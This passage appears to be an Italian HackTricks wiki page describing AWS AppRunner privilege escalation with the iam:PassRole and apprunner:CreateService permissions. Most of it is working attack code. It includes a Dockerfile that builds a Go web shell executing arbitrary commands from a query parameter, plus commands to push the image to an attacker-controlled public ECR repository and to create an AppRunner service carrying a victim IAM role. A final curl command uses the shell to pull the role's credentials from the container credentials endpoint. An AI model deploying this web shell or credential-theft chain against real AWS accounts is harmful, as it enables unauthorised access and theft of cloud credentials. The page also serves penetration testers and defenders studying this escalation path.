# AWS - AppRunner Privesc

{{#include ../../../../banners/hacktricks-training.md}}

## AppRunner

### `iam:PassRole`, `apprunner:CreateService`

Un attacker con questi permessi può creare un servizio AppRunner con un IAM role allegato, potenzialmente elevando i privilegi accedendo alle credenziali del role.

L'attacker crea prima un Dockerfile che funge da web shell per eseguire comandi arbitrari sul container AppRunner.
```Dockerfile
FROM golang:1.24-bookworm
WORKDIR /app
RUN apt-get update && apt-get install -y ca-certificates curl
RUN cat <<'EOF' > main.go
package main

import (
"fmt"
"net/http"
"os/exec"
)

func main() {
http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
command := exec.Command("sh", "-c", r.URL.Query().Get("cmd"))
output, err := command.CombinedOutput()
if err != nil {
fmt.Fprint(w, err.Error(), output)
return
}

fmt.Fprint(w, string(output))
})
http.ListenAndServe("0.0.0.0:3000", nil)
}
EOF
RUN go mod init test && go build -o main .
EXPOSE 3000
CMD ["./main"]
```
Quindi, push questa immagine in un repository ECR.
Spingendo l'immagine in un repository pubblico in un account AWS controllato dall'attacker, la privilege escalation è possibile anche se l'account della victim non ha i permessi per manipolare ECR.
```sh
IMAGE_NAME=public.ecr.aws/<alias>/<namespace>/<repo-name>:latest
docker buildx build --platform linux/amd64 -t $IMAGE_NAME .
aws ecr-public get-login-password | docker login --username AWS --password-stdin public.ecr.aws
docker push $IMAGE_NAME
docker logout public.ecr.aws
```
Successivamente, l'attaccante crea un servizio AppRunner configurato con questa web shell image e l'IAM Role che vuole sfruttare.
```bash
aws apprunner create-service \
--service-name malicious-service \
--source-configuration '{
"ImageRepository": {
"ImageIdentifier": "public.ecr.aws/<alias>/<namespace>/<repo-name>:latest",
"ImageRepositoryType": "ECR_PUBLIC",
"ImageConfiguration": { "Port": "3000" }
}
}' \
--instance-configuration '{"InstanceRoleArn": "arn:aws:iam::123456789012:role/AppRunnerRole"}' \
--query Service.ServiceUrl
```
Dopo aver atteso il completamento della creazione del servizio, usa il web shell per recuperare le container credentials e ottenere i permessi dell'IAM Role associato ad AppRunner.
```sh
curl 'https://<service-url>/?cmd=curl+http%3A%2F%2F169.254.170.2%24AWS_CONTAINER_CREDENTIALS_RELATIVE_URI'
```
**Impatto potenziale:** Escalation di privilegi diretta a qualsiasi IAM role che può essere associato ai servizi AppRunner.

{{#include ../../../../banners/hacktricks-training.md}}
